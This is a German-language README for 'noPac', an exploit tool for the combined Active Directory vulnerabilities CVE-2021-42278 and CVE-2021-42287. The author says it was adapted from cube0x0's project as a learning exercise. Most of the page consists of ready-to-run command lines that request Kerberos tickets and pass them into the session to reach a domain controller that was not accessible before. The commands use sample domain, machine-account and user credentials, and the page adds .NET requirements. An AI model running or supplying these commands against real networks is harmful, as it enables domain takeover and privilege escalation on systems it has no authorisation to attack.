
CVE-2021-42287/CVE-2021-42278 Exploiter
Dieses Projekt entstand aus dem Wunsch, das Prinzip von noPac zu erlernen. Es wurden einige Änderungen auf Basis des cube0x0 Projekts vorgenommen. Im Quellcode wurden persönliche Verständniskommentare hinzugefügt.
Eine Analyse der Schwachstelle finden Sie in meinem Blogartikel: noPac Analyse
noPac ist eine kombinierte Ausnutzung von CVE-2021-42278 (sAMAccountName Spoofing) und CVE-2021-42287 (Täuschung des KDC). Eine erfolgreiche Ausnutzung ist nur möglich, wenn die Bedingungen für beide Schwachstellen gleichzeitig erfüllt sind.
Beispiele: TGT und ST erhalten
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs
Beispiele: PTT
noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
Die gebräuchlichste Methode ist PTT:
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
Vor der Nutzung von noPac besteht kein Zugriff auf den DC.

Nutzung von noPac.
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Nach PTT kann der DC im aktuellen Fenster erneut aufgerufen und erfolgreich zugegriffen werden.

Beachten Sie, dass das Programm nur auf Maschinen mit .NET 4.0+ Umgebung läuft. Windows Server 2012 hat standardmäßig .NET 4.0, Windows Server 2008 hat standardmäßig .NET 3.5.
Überprüfung der vorhandenen .NET-Version auf der Maschine:
dir c:\Windows\Microsoft.NET\Framework64
